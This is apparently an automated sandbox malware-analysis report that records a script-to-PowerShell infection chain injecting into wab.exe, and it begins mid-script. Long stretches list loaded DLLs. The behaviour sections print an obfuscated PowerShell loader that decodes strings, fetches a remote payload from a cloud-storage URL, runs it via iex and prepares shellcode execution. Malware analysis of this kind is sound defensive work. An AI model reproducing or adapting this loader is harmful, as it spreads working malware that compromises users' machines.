owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Folkeslaget.Opi && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: comsvcs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cmlua.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cmutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: ore.pdb source: powershell.exe, 0000000B.00000002.3210783134.00000000089BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.3191614881.000000000327D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger sh", "Unsupported parameter type 00000000")
Source: Yara match File source: 0000000B.00000002.3212165628.000000000CB1E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3211992987.0000000008DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3194915385.000000000615A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3577666635.00000197D36A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Sjlesorger)$global:Mainframes = [System.Text.Encoding]::ASCII.GetString($Uppiled)$global:Kyndig=$Mainframes.substring($Facially,$Tilvrelsesforms)<#Persicot Stereoed Grundtrk Militari
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Bevgelsernes $Interphaselludere56 $Falcinellus), (Besvrgedes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Udviklingsfasernes = [AppDomain]::CurrentDomai
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Lunede)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Gennemtnke, $false).DefineType($Vorbasse, $Udnytte
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Sjlesorger)$global:Mainframes = [System.Text.Encoding]::ASCII.GetString($Uppiled)$global:Kyndig=$Mainframes.substring($Facially,$Tilvrelsesforms)<#Persicot Stereoed Grundtrk Militari
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge 'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[ P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge ' ,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 